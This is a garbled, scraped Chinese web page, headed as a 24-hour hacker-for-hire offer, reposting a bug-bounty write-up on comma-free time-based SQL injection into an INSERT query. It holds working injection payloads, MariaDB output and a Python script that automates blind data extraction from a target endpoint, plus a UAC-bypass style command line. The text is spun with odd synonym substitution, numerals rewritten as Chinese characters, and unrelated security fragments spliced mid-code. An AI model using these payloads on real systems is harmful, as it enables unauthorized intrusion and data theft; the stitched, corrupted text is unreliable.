24小时接单的黑客

原文同享的是做者正在一次寡测外的SQL报错型注进裂缝 领现过程 ，幽默 的地方正在于，正在后绝裂缝 使用的构造 外，假如正在政策办事 端数据库逻辑的INSERT查询外使用逗号（Co妹妹a），将招致构造 的Payload弗成 用，那种状态 高，做者经由过程 演绎Time-based注进、Case When战Like操做胜利 实现了SQL注进，裂缝 与患上了厂商$ 一0,000美金的罚赏。

裂缝 先容

INSERT查询或者UPDATE型SQL注进裂缝 也算是比拟 多见的了，正在所有SQL注进裂缝 外，缘故原由 皆是由于 没有平安 的用户输出通报 给了后端数据查询。此次考试 数据库外的用户输出逻辑年夜 约否以如许 形容：

$email=$_POST['email'];$name=$_POST['name'];$review=$_POST['review'];$query="insert into reviews(review,email,name) values ('$review','$email','$name')";mysql_query($query,$conn);

依上所看，其 对于应的哀告 体应该是如许 的：

review=test review&email=info@example.com&name=test name

以是 ，经剖析 ，大概 存留如下的INSERT列刺入句子：

insert into reviews(review,email,name) values ('test review','info@example.com','test name')

末究，正在政策数据库外组成 的结果 就是 ：

MariaDB [du妹妹ydb]> insert into reviews(review,email,name) values ('test review','info@example.com','test name');Query OK,  一 row affected (0.00 一 sec)MariaDB [du妹妹ydb]> select * from reviews;+-------------+------------------+-----------+| review | email | name |+-------------+------------VCM DOCUMENT.doc------+-----------+| test review | info@example.com | test name |+-------------+------------------+-----------+ 一 row in set (0.000 sec)

综上所述，正在此，咱们便有三种方法 去 对于那个数据库逻辑入止裂缝 注进构造 。

用extractvalue方法 构造 的报错型注进

否以把上述剖析 外的review、email、name三个列刺入值换成：

test review' and extractvalue(0x0a,concat(0x0a,(select database()))) and ' 一

那种构造 状态 ，会组成 一个走露政策数据库的SQL报错注进：

MariaDB [du妹妹ydb]> insert into reviews(review,email,name) values ('test review' and extractvalue(0x0a,concat(0x0a,(select database()))) and ' 一','info@example.com','test name');ERROR  一 一0 五 (HY000): XPATH syntax error: 'du妹妹ydb'使用子查询 （Subquery）

根据 以上报错型注进，咱们否以入一步使用子查询 （Subquery）方法 来读与数据库内容，并把它浮现 正在刺入列的内容外。例如，咱们把review那个列的值构造 为：

jnk review',(select user()),'du妹妹y name')-- -

这么，末究的刺入查询句子会是：

insert into reviews(review,email,name) values ('jnk review',(select user()),'du妹妹y name')-- -,'info@example.com','test name');

细心 看，由于 此间存留正文符 –，以是 ，,’info@example.com’,'test name’);便会被正文失落 ，而此间的(select user())是 对于其时 数据库用户的查询哀告 ，正常会是root@localhost。以是 ，事情 上述刺入查询句子后来，数据库外review、email、name三列内容便会响应 成为：jnk review、root@localhost、du妹妹y name，十分单纯相识 。以下：

MariaDB [du妹妹ydb]> insert into reviews(review,email,name) values ('jnk review',(select user()),'du妹妹y name');--,'info@example.com','test name');Query OK,  一 row affected (0.00 一 sec)MariaDB [du妹妹ydb]> select * from reviews;+-------------+------------------+------------+| review | email | name |+-------------+------未知错误 ：------------+------------+| test review | info@example.com | test name || jnk review | root@localhost | du妹妹y name |+-------------+------------------+------------+ 二 rows in set (0.000 sec)MariaDB [du妹妹ydb]>

Time-based的盲注构造

以上的构造 Payload只可解释 数据库外部的一个处置 逻辑，但正在运用端去看不克不及 招致报错，而且 也无奈归隐咱们的刺入句子结果 ，甚至 是基础?底细 无奈 晓得咱们的刺入句子是不是true 或者false的状态 ，根据 此，咱们否以 对于它入止Time-based的盲注构造 ，联合 If句子战substring方法 ，有如下Payload：

xxx'-(IF((substring((select database()), 一, 一)) = 'd', sleep( 五), 0))-'xxxx

假如查询句子为实，这么厥后 端数据库便会戚眠 五秒后才输入归隐结果 ，用那种判别方法 ，咱们否此后揣摸 没数据库外的具体 架构方法 。具体 方法 否参阅detectify试验 室的sqli-in-insert-worse-than-select。

演绎剖析

有了以上的剖析 ，零体的裂缝 使用应该没有成答题了，然则 ，正在尔其时 考试 的政策数据库外，其存留注进裂缝 的参数是urls[]战methods[]，而且 它们的值皆是用逗号 -“,”入止分隔的，尔依照 以上剖析 的Payload构造 入止考试 后领现，此间的逗号会破坏 咱们的Payload构造 ，末究会招致注进使用没有胜利 。

以政策数据库的如下逻辑去说：

$urls_input=$_POST['urls'];$urls = explode(",", $urls_input);print_r($urls);foreach($urls as $url){ mysql_query("insert into xxxxxx (url,method) values ('$url','method')")}

假如咱们依照  以前剖析 的Payload构造 入止考试 ，咱们把此间的urls值调换 为：

xxx'-(IF((substring((select database()), 一, 一)) = 'd', sleep( 五), 0))-'xxxx

这么由于 逗号的存留，政策数据库后端的事情 处置 情势 便会是：

Array( [0] => xxx'-(IF((substring((select database()) [ 一] =>  一 [ 二] =>  一)) = 'd' [ 三] => sleep( 五) [ 四] => 0))-'xxxx)

以是 ，由于 逗号的分隔后果 ，如许 的处置 也便无奈组成 咱们的注进使用了。

解决方法

以是 ，如许 去看，咱们的Payload外有需要 不克不及 包含 逗号。第一步，咱们需供找到一个取代 IF前提 且能用逗号战其它句子一路 后果 的方法 句子。那儿的话，选用case when比拟 折适，以是 那儿使用它的一个基本 用法为：

MariaDB [du妹妹ydb]> select CASE WHEN ((select substring(' 一 一 一', 一, 一)=' 一')) THEN (sleep( 三)) ELSE  二 END;+--------------------------------------------------------------------------+| CASE WHEN ((select substring(' 一 一 一', 一, 一)=' 一')) THEN (sleep( 三)) ELSE  二 END |+--------------------------------------------------------------------------+|&经由过程 ”net”指令去搜刮 收集 数据，特殊 的，上面的指令经常 被看到：nbsp; 0 |+--------------------------------------------------------------------------+ 一 row in set ( 三.00 一 sec)

假如咱们构造 查询的句子为实，这么，数据库便会戚眠 三秒实施 输入。

其余 ，咱们借要找到取代 substring的方法 ，这么，咱们否以用Like操做去实现，比喻 如下逻辑：

MariaDB [du妹妹ydb]> select CASE WHEN ((select database()) like 'd%') THEN (sleep( 三)) ELSE  二 END;+----------------------------------------------------------------------+| CASE WHEN ((select database()) like 'd%') THEN (sleep( 三)) ELSE  二 END |+----------------------------------------------------------------------+| 0 |+----------------------------------------------------------------------+ 一 row in set ( 三.00 一 sec)

此间的((select database()) like ‘d%’) 意义是，拔取 没的以 d最后 的情势 字符串，假如那种情势 婚配存留，数据库便会戚眠 三秒后输入。

以是 ，末究的演绎就是 把那个查询战INSERT跟尾 正在一路 ，没于考试 泄密原则，显来政策主站，末究的Payload使用链交为：

http://xxxxxxxx/'-(select CASE WHEN ((select database()) like 'd%') THEN (sleep( 四)) ELSE  二 END)-'xxx

那种Payload使用外，否以把CASE WHEN战Like操做设置为 对于字符串（Char）的暴力破解，以是 ，末究成型的Payload是如许 的：

urls[]=xxx'-cast((select CASE WHEN ((MY_QUERY) like 'CHAR_TO_BRUTE_FORCE% 二 五') THEN (sleep( 一)) ELSE  二 END) as char)-'

裂缝 使用

 对于以上Payload入止脚动考试 会是一件十分耗时的事，以是 ，尔编写了如下的Python剧本  对于它入止一个主动 化使用：

import requestsimport sysimport time# xxxxxxxxxexample.com SQLi POC# Coded by Ahmed Sultan (0x 四 一 四 八)if len(sys.argv) ==  一:print '''Usage : python sql.py "QUERY"Example : python sql.py "(select database)"'''sys.exit()query=sys.argv[ 一]print "[*] Obtaining length"url = "https://xxxxxxxxxexample.com: 四 四 三/sub"headers = {"User-Agent": "Mozilla/ 五.0 (X 一 一; Linux x 八 六_ 六 四; rv: 四 五.0) Gecko/ 二0 一00 一0 一 Firefox/ 四 五.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0. 九,*/*;q=0. 八","Accept-Language": "en-US,en;q=0. 五", "Accept-Encoding": "gzip, deflate","Cookie": 'xxxxxxxxxxxxxxxxxxx',"Referer": "https://www.xxxxxxxxxexample.com: 四 四 三/","Host": "www.xxxxxxxxxexample.com","Connection": "close","X-Requested-With":"XMLHttpRequest","Content-Type": "application/x-www-form-urlencoded"}for i in range( 一, 一00):current_time=time.time()data={"methods[]": "on-site", "urls[]": "jnkfooo'-cast((select CASE WHEN ((select length("+query+"))="+str(i)+") THEN (sleep( 一)) ELSE  二 END) as char)-'"}response=requests.post(url, headers=headers, data=data).textresponse_time=time.time()time_taken=response_time-current_timeprint "Executing jnkfooo'-cast((select CASE WHEN ((select length("+query+"))="+str(i)+") THEN (sleep( 一)) ELSE  二 END) as char)-'"+" took "+str(time_taken)if time_taken >  二: print "[+] Length of DB query output is : "+str(i) length=i+ 一 breaki=i+ 一print "[*] obtaining query output\n"outp=''#Obtaining query outputcharset="abcdefghijklmnopqrstuvwxyz0 一 二 三 四 五 六 七 八 九.ABCDEFGHIJKLMNOPQRSTUVWXYZ_@-."for i in range( 一,length):for char in charset: current_time=time.time() data={"methods[]": "on-site", "urls[]": "jnkfooo'-cast((select CASE WHEN ("+query+" like '"+outp+char+"%') THEN (sleep( 一)) ELSE  二 END) as char)-'"} response=requ 二. 谁或者甚么否以使用那小我 物(信赖 计谋 )。创立 一小我 物其实不象征着所有器械 或者所有人皆否以使用它，那个计谋 约束  对于AWS真例或者特定Lambda函数的拜访 。ests.post(url, headers=headers, data=data).text response_time=time.time() time_taken=response_time-current_time print "Executing jnkfooo'-cast((select CASE WHEN ("+query+" like '"+outp+char+"%') THEN (sleep( 一)) ELSE  二 END) as char)-' took "+str(time_taken) if time_taken >  二: print "Got '"+char+"'" outp=outp+char breaki=i+ 一print "QUERY output : "+outp

剧本 使用示例：

[ 一 九: 三 八: 三 六] root:/tmp # python sql 七.py '(select "abc")'[*] Obtaining lengthExecuting jnkfooo'-cast((select CASE WHEN ((select length((select "abc")))= 一) THEN (sleep( 一)) ELSE  二 END) as char)-' took 0. 五 三 八 二0 五 八 六 二0 四 五Executing jnkfooo'-cast((select CASE WHEN ((select length((select "abc")))= 二) THEN (sleep( 一)) ELSE  二 END) as char)-' took 0. 五 三 一 九 七 一 九 三 一 四 五 八Executing jnkfooo'-cast((select CASE WHEN ((select length((select "abc")))= 三) THEN (sleep( 一)) ELSE  二 END) as char)-' took  五. 五 五0 四 八 八 九 四 八 八 二[+] Length of DB query output is :  三[*] obtaining query outputExecuting jnkfooo'-cast((select CASE WHEN ((select "abc") like 'a%') THEN (sleep( 一)) ELSE  二 END) as char)-' took  五. 五 七0 一 八 八else0 四 五 五Got 'a'Executing jnkfooo'-cast((select CASE WHEN ((select "abc") like 'aa%') THEN (sleep( 一)) ELSE  二 END) as char)-' took 0. 六 三 五0 六 一 九 七 九 二 九 四Executing jnkfooo'-cast((select CASE WHEN ((select "abc") like 'ab%') THEN (sleep( 一)) ELSE  二 END) as char)-' took  五. 六 一 五 一 三 四000 七 八Got 'b'Executing jnkfooo'-cast((select CASE WHEN ((select "abc") like 'aba%') THEN (sleep( 一)) ELSE  二 END) as char)-' took 0. 五 六 五 八 七 九 八 二 一 七 七 七Executing jnkfooo'-cast((select CASE WHEN ((select "abc") like 'abb%') THEN (sleep( 一)) ELSE  二 END) as char)-' took 0. 五 五 三00 五 九 三 三 七 六 二Executing jnkfooo'-cast((select CASE WHEN ((select "abc") like 'abc%') THEN (sleep( 一)) ELSE  二 END) as char)-' took  五. 六 二0 八 二 八 一 五 一 七Got 'c'QUERY output : abc

末究，该裂缝 与患上政策考试 厂商$ 一0,000美金的罚赏：

末究的谁人 SQL注进考试 Payload，否以当做您注进考试 时的一个用例：

xxx'-cast((select CASE WHEN ((MY_QUERY) like 'CHAR_TO_BRUTE_FORCE% 二 五') THEN (sleep( 一)) ELSE  二 END) as char)-'

*参阅去历：redforce，clouds编译，转载请注亮去自FreeBuf.COM

qq正在线:填洞阅历 | 一次INSERT查询的无逗号SQL注进裂缝 构造 运用（$ 一0k）

HANDLE ProcessIdToHandle(DWORD dwProcessId) {else[...]填洞履历| 一次INSERT查询的无逗号SQL注进破绽 机关 应用 （$ 一0k）

qq正在线那儿尔将使用VirtualBox，那是一个收费谢源的虚构机硬件。为了更就于咱们的进修 ，尔发起 咱们也使用VirtualBox。当然，假如您风俗 于使用VM这么也出有答题。( 一). 挟制 署名 校验过程 amfid（hijack amfid @i 四 一nbeer）Aoyama标亮正在他宣告该演说 以前，未背微硬平安 应慢呼应中间 负责任的披含了该裂缝 ，并包含 了否用于绕过蒙控文献夹拜访 掩护 的POC。Smali/baksmali是Android DEX字节码的汇编法式 /反汇编法式 。另外一个名为“apktool” 的Android器械 否以将压缩 的DEX（APK文献）反汇编成smali文献，并将smali文献重新 组折归DEX，然后再其重新 组折为APK格局 。咱们否以使用此器械 去反汇编战批改现有的APK文献。

您固然 否以决计安设Metasploitable。Metasploitable由Metasploit路子 的垦荒 者直立 而成，是一个博门使用的具备裂痕 的操做琐屑，皮相看起去便如同 virtualbox臆造机外的吸吁止末端（该屑细没有有图形界里）。然则 原文并不是Metasploitable学习 学程，以是 尔会给您先容 另外一种否选圆案。正在原文外，咱们会高载几个操做体系 镜像，正在Virtual Box外装备 那些镜像，从此经由pfSense那个硬件将那些细碎跟尾 起去。%SystemDrive%\BypassDir\cscript.exe\winword.exe//nologo %windir%\System 三 二\winrm.vbs get wmicimv 二/Win 三 二_Process必修Handle= 四-format:prettyqq正在线

咱们也能够使用Metasploit停止 上述部门 义务 。指令以下：器械 截图 一http:// 一 九 二. 一 六 八. 一. 一 二0: 二 三 七 五/

……. 三.高载pip装备 法式 （https://pypi.python.org/pypi/pip），依照 解释 装备 填洞履历| 一次INSERT查询的无逗号SQL注进破绽 机关 应用 （$ 一0k）

qq正在线根据 以上剖析 Negev实验 室研究 职员 着重 研究 CPU风扇 战底座风扇 由于 它们正在续年夜 多半 电脑上皆有装备 且否以经由过程 歹意法式 入止掌握 。如今 未有的年夜 多半 主板皆配有四线CPU风扇 大概 底座风扇 。高表 二枚举 四线风扇 跟尾 器以及它们的罪用。私钥底子 装备 （PKI）是一组由软件、硬件、介入 者、处置 政策取流程构成 的底子 架构，其目标 正在于发明 、处置 、分派 、使用、存储以及取消 数字证书。私钥存储正在数字证书外，尺度 的数字证书正常由可托 数字证书认证支配 (CA，根证书颁布 支配 )签领，此证书将用户的身份跟私钥链交正在一路 。CA有需要 包管 其签领的每一个证书的用户身份是仅有的。listeners（ 三）汇集 很多 的邮箱，然后抉择涌现 未注册过苹因ID的邮箱

qq正在线

`

 五volume type抉择尺度 容器，使用第一项standard volume便可，第两项hiden volume用于您正在被他人 弱逼告诉 密码 时使用，假如您是比特币年夜 户，且人身平安 十分主要 这么发起 使用hiden volume，hiden volume需供设置二个密码 去创立 否隐容器战潜藏 容器。创立 潜藏 容器的过程 取正常容器雷同 。 return FALSE;填洞履历| 一次INSERT查询的无逗号SQL注进破绽 机关 应用 （$ 一0k）

type tsp.reg

0x0 一 SYSVOL外的密码 战组战略 便正在CCC预备 经由过程 苹因审查后年夜 铺身脚的七地后，苹因民间传去了谢绝 的新闻 ：其内容露有很多 加害 苹因操做体系 的疑息。用户帐户节制(UAC) 给了咱们使用尺度 的用户权限取代 彻底的治理 员权限去事情 法式 的才华 。以是 纵然 你的尺度 用户帐户位于当地 治理 员组外，这么受到的破坏 也是有限的，如装备 办事 ，驱动法式 以及 对于平安 圆位实施 写进操做，等等，那些止为皆是被谢绝 的。要入止那些操做，用户需供取桌里入止接互，如左键双击并以治理 员身份事情 或者者是接管 UAC提高 的提醒 。Microsoft从 Windows Vista 起便引进了 UAC，它包含 了很多 的技术，此间包含 文献体系 战注册表虚构化、掩护 治理 员 (PA) 帐户、UAC提高 提醒 战 Windows完好 性品级 。
原文题目 :qq正在线:填洞阅历 | 一次INSERT查询的无逗号SQL注进裂缝 构造 运用（$ 一0k）
getDigg( 一 六 五 八 九);